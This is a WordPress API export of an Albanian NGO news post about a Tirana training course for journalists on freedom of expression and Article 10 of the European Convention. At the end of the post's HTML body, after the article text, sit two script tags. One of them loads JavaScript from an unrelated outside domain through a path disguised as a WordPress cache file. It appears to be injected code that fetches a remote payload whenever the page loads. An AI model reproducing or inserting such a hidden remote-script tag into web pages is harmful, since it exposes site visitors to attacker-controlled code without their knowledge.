{"id":508,"date":"2012-10-30T12:11:32","date_gmt":"2012-10-30T10:11:32","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=508"},"modified":"2013-09-30T12:12:44","modified_gmt":"2013-09-30T10:12:44","slug":"perfundon-trajnimi-liria-e-shprehjes-nga-teoria-ne-praktike-2","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=508","title":{"rendered":"P\u00ebrfundon trajnimi \u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d"},"content":{"rendered":"<p>Sot, m\u00eb 13 tetor 2013 u zhvillua n\u00eb ambientet e Hotel \u201cMondial\u201d n\u00eb Tiran\u00eb, trajnimi p\u00ebr gazetar\u00ebt dhe profesionist\u00ebt e medias, me tem\u00eb: \u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d. Me pjes\u00ebmarrje t\u00eb mbi 30 prej emrave m\u00eb t\u00eb njohur t\u00eb gazetaris\u00eb investigative shqiptare, pedagog\u00eb t\u00eb Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs dhe ekspert\u00eb t\u00eb fush\u00ebs, vendas dhe t\u00eb huaj, u prezantuan konceptet q\u00eb duhen t\u00eb ken\u00eb parasysh gazetar\u00ebt dhe profesionist\u00ebt e medias n\u00eb raport me lirin\u00eb e shprehjes.<\/p>\n<p>Organizuar nga Res Publica dhe mb\u00ebshtetur nga National Endowment for Democracy, trajnimi ofroi nj\u00eb gam\u00eb t\u00eb gjer\u00eb konceptesh, t\u00eb thjeshtuara p\u00ebr t\u2019u kuptuar m\u00eb mir\u00eb nga gazetar\u00ebt dhe profesionist\u00ebt e medias.<\/p>\n<p>Trajnimi u cel me nj\u00eb prezantim t\u00eb Dekanit t\u00eb Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs, Dr. Altin Shegani, i cili b\u00ebri nj\u00eb hyrje n\u00eb konceptet baz\u00eb t\u00eb liris\u00eb s\u00eb shprehjes dhe r\u00ebnd\u00ebsis\u00eb q\u00eb ajo ka n\u00eb nj\u00eb shoq\u00ebri demokratike. M\u00eb pas u trajtua nj\u00eb material i p\u00ebrgatitur nga Yllka Lamce (Kandidate p\u00ebr doktoratur\u00eb), i cili hodhi drit\u00eb mbi konceptet e liris\u00eb s\u00eb shprehjes sic p\u00ebrcaktohen n\u00eb Kushtetut\u00eb dhe n\u00eb Konvent\u00ebn Europiane p\u00ebr t\u00eb Drejtat e Njeriut, material i cili u prezantua nga Av. Andi Kananaj. Nj\u00eb tjet\u00ebr pedagog i Fakultetit t\u00eb Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs, Dr. Ervin Pupe, prezantoi disa koncepte interesante lidhur me p\u00ebrgjegj\u00ebsin\u00eb civile t\u00eb gazetar\u00ebve dhe profesionist\u00ebve t\u00eb medias, n\u00eb rastet kur ata mund t\u00eb tejkalojn\u00eb kufijt\u00eb e mbrojtjes nga ligji. Trajnimi pati edhe nj\u00eb t\u00eb ftuar t\u00eb huaj, ekspertin e jurisprudenc\u00ebs s\u00eb Gjykat\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut, Av. Theodoros Alexandridis, i cili solli nj\u00eb rezume t\u00eb interpretimit t\u00eb detajuar t\u00eb Nenit 10 t\u00eb Konvent\u00ebs, i cili mbron lirin\u00eb e shprehjes.<\/p>\n<p>N\u00eb pjes\u00ebn e dyt\u00eb, Av. Theodoros Alexandridis solli n\u00eb v\u00ebmendje t\u00eb gazetar\u00ebve dhe profesionist\u00ebve t\u00eb medias nj\u00eb material praktik, nj\u00eb udh\u00ebzues p\u00ebr cfar\u00eb i lejohet nj\u00eb gazetari dhe cfar\u00eb nuk i lejohet t\u00eb kryej\u00eb. Cdo udh\u00ebzues u shoq\u00ebrua me raste konkrete nga jurisprudenca e Gjykat\u00ebs s\u00eb Strasburgut. Av. Dorian Matlija dhe Av. Edvin Kukunja, me asistenc\u00ebn edhe t\u00eb studentes praktikante Arbesa Kurti, soll\u00ebn nj\u00eb rezume t\u00eb c\u00ebshtjeve q\u00eb ka ndjekur Res Publica n\u00eb mbrojtje t\u00eb interesave t\u00eb gazetar\u00ebve n\u00eb gjykatat shqiptare. Rastet u shoq\u00ebruan edhe me disa konkluzione t\u00eb cilat iu shtruan debatit mes pjes\u00ebmarr\u00ebsve p\u00ebr t\u00eb kuptuar nivelin e p\u00ebrfitimit t\u00eb koncepteve t\u00eb trajtuara n\u00eb k\u00ebt\u00eb trajnim.<\/p>\n<p>N\u00eb p\u00ebrfundim, pjes\u00ebmarr\u00ebsve iu shp\u00ebrnda edhe nj\u00eb certifikat\u00eb p\u00ebr pjes\u00ebmarrjen n\u00eb trajnim, t\u00eb n\u00ebnshkruar nga titullar\u00ebt akademik\u00eb t\u00eb pranish\u00ebm. R\u00ebnd\u00ebsi t\u00eb madhe pati debati i ndezur, i cili doli p\u00ebrtej parashikimeve t\u00eb organizator\u00ebve, duke qen\u00eb nj\u00eb indikator i vlefsh\u00ebm p\u00ebr interesin e gazetar\u00ebve rreth koncepteve t\u00eb trajtuara dhe p\u00ebr p\u00ebrthithjen e suksesshme t\u00eb tyre.<\/p>\n<p>Gjat\u00eb trajnimit nuk munguan leht\u00ebsirat e prezantimit elektronik, aksesi n\u00eb internet, v\u00ebnia n\u00eb dispozicion i materialeve t\u00eb zgjeruara p\u00ebr cdo pjes\u00ebmarr\u00ebs, etj.<\/p>\n<p>Duke falenderuar pjes\u00ebmarr\u00ebsit dhe ekspert\u00ebt, Res Publica shprehet optimiste q\u00eb aktivitete t\u00eb tjer\u00eb do t\u00eb jen\u00eb t\u00eb mir\u00ebpritur nga gazetar\u00ebt, profesionist\u00ebt e medias dhe p\u00ebrfaq\u00ebsuesit e organizatave t\u00eb gazetar\u00ebve, t\u00eb cil\u00ebt gjat\u00eb trajnimit, por edhe n\u00eb pushim hodh\u00ebn ide t\u00eb ndryshme, t\u00eb cilat Res Publica do t\u2019i p\u00ebrpunoj\u00eb n\u00eb nisma konkrete n\u00eb nj\u00eb ardhme t\u00eb af\u00ebrt.<\/p>\n<p>D. Matlija<\/p>\n<div id=\"jp-post-flair\">\n<h3><\/h3>\n<div><\/div>\n<\/div>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sot, m\u00eb 13 tetor 2013 u zhvillua n\u00eb ambientet e Hotel \u201cMondial\u201d n\u00eb Tiran\u00eb, trajnimi p\u00ebr gazetar\u00ebt dhe profesionist\u00ebt e [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":509,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/508"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=508"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/508\/revisions"}],"predecessor-version":[{"id":510,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/508\/revisions\/510"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/509"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}